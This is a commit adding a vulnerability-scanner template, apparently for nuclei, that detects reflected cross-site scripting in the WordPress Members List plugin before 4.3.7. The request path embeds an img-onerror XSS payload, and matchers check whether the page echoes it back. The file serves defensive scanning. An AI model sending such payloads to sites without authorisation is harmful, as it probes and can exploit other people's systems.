Merge pull request #4788 from projectdiscovery/members-list-xss

Create members-list-xss.yaml
2022-07-09 18:46:46 +05:30 · 2022-07-09 18:46:46 +05:30 · adb72d7361
parent 04cf9eaa62 58bd909659
commit adb72d7361
1 changed files with 33 additions and 0 deletions
--- a/vulnerabilities/wordpress/members-list-xss.yaml
+++ b/vulnerabilities/wordpress/members-list-xss.yaml
@ -0,0 +1,33 @@
+id: members-list-xss
+
+info:
+  name: Members List < 4.3.7 - Reflected Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: The plugin does not sanitise and escape some parameters in various pages before outputting them back, leading to Reflected Cross-Site Scripting issues.
+  reference:
+    - https://wpscan.com/vulnerability/d13f26f0-5d91-49d7-b514-1577d4247648
+  tags: wp,wordpress,wp-plugin,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/members-list/admin/view/user.php?page=%22%3E%3Cimg%20src%20onerror=alert(document.domain)%20x'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><img src onerror=alert(document.domain) x'
+          - "wrap tern-wrap"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200